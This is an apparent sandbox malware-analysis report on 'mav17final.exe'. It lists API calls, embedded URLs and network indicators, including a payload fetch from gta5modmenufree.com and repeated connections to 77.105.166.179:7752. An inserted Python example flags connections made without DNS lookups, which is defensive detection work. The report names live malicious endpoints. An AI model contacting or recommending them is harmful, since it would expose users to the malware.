      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073128104.00007FF8B93C8000.00000002.00000001.01000000.00000008.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: mav17final.exe, 00000002.00000002.2068496795.00007FF8A8CEB000.00000002.00000001.01000000.00000004.sdmp
      Source: C:\Users\user\Desktop\mav17final.exe; Code function: 0_2_00007FF79EA487C0 FindFirstFileExW,FindClose,0_2_00007FF79EA487C0
      Source: C:\Users\user\Desktop\mav17final.exe; Code function: 0_2_00007FF79EA53A64 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exe; Code function: 0_2_00007FF79EA53A64 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exe; Code function: 0_2_00007FF79EA5D354 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,0_2_00007FF79EA5D354
      Source: C:\Users\user\Desktop\mav17final.exe; Code function: 2_2_00007FF8B9075AC0 SetErrorMode,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,GetVolumeInformationA,SetLastError,FindFirstVolumeMountPointA,FindNextVolumeMountPointA,FindVolumeMountPointClose,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,2_2_00007FF8B9075AC0
      Source: global traffic; TCP traffic: 192.168.2.5:49704 -> 77.105.166.179:7752
      Source: Joe Sandbox View; IP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox View; IP Address: 188.114.96.3 188.114.96.3
      Source: unknown; TCP traffic detected without corresponding DNS query: 77.105.166.179 (this event is listed 50 times in the report)
      Source: C:\Users\user\Desktop\mav17final.exe; Code function: 2_2_00007FF8B93C57F8 recv,2_2_00007FF8B93C57F8
      Source: global traffic; HTTP traffic detected: GET /CSHQRtZu/standingcpu HTTP/1.1 | Accept: */* | Connection: close | Host: gta5modmenufree.com | User-Agent: cpp-httplib/0.12.6
      Source: global traffic; DNS traffic detected: DNS query: gta5modmenufree.com
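The indicator "TCP traffic detected without corresponding DNS query" comes from correlating each outbound flow with the DNS answers the host received: the download host gta5modmenufree.com was looked up, while the 50 connections to 77.105.166.179:7752 went straight to an IP on a non-standard port. The following is an added example, not from the report or from Joe Sandbox, that implements that correlation and summarises what remains by destination and port. The records are constructed from the indicators above; the resolution of gta5modmenufree.com to 188.114.96.3, the timestamps, the LAN control flow and the record fields are assumptions.

```python
"""Correlate outbound TCP flows with observed DNS answers and report flows
whose destination was never resolved. Added example; all records below are
constructed and the record fields are an assumption."""
import ipaddress
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class DnsAnswer:
    ts: float     # seconds since capture start
    qname: str
    rdata: str    # IPv4 address returned


@dataclass(frozen=True)
class Flow:
    ts: float
    src: str
    dst: str
    dport: int


# Ports on which direct-to-IP connections are routine enough that a missing
# DNS lookup alone is weak evidence.
COMMON_PORTS = {25, 53, 80, 123, 135, 139, 443, 445, 587}


def flows_without_dns(flows, answers, window=300.0):
    """Return flows to public addresses whose dst was not returned by any DNS
    answer in the preceding `window` seconds."""
    seen = defaultdict(list)              # ip -> timestamps at which it was resolved
    for a in answers:
        seen[a.rdata].append(a.ts)
    out = []
    for f in flows:
        if ipaddress.ip_address(f.dst).is_private:
            continue                      # LAN traffic needs no DNS lookup
        if any(0 <= f.ts - t <= window for t in seen.get(f.dst, ())):
            continue                      # destination was resolved shortly before
        out.append(f)
    return out


def summarise(flows):
    """Group flows by (dst, dport), most frequent first, and flag unusual ports."""
    counts = Counter((f.dst, f.dport) for f in flows)
    return [
        {"dst": dst, "dport": port, "count": n, "nonstandard_port": port not in COMMON_PORTS}
        for (dst, port), n in counts.most_common()
    ]


# Constructed records modelled on the report: one lookup of the download host,
# the HTTP fetch that followed it, 50 direct connections to the IP the sample
# contacts on port 7752, and one LAN flow as a control.
SAMPLE_DNS = [DnsAnswer(10.0, "gta5modmenufree.com", "188.114.96.3")]
SAMPLE_FLOWS = (
    [Flow(11.0, "192.168.2.5", "188.114.96.3", 80)]
    + [Flow(20.0 + 6 * i, "192.168.2.5", "77.105.166.179", 7752) for i in range(50)]
    + [Flow(12.0, "192.168.2.5", "192.168.2.1", 445)]
)

if __name__ == "__main__":
    for row in summarise(flows_without_dns(SAMPLE_FLOWS, SAMPLE_DNS)):
        print(row)
```

The window matters: a resolution from hours earlier should not excuse a new connection, since the malware may be carrying the address in its configuration, which is exactly the case for a miner with a hard-coded pool or proxy address.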
      Source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.co
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: mav17final.exe, 00000002.00000003.1996191490.0000018717925000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/zeJZl
      Source: mav17final.exe, 00000002.00000002.2066729753.0000018718BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2066729753.0000018718BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986923554.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1986200880.000001F87EF8E000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000000.00000003.1988327317.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: mav17final.exe, 00000002.00000003.1995336796.000001871785B000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
      Source: mav17final.exe, 00000002.00000003.1995217340.00000187178BB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2066729753.0000018718C38000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
      Source: mav17final.exe, 00000002.00000003.2041722275.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046833551.00000187176AB000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2045701458.0000018717883000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2033297099.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2046317483.00000187176AA000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2052090144.00000187176AC000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2064361091.0000018717883000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2052889217.00000187176B2000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2050639413.0000018717883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
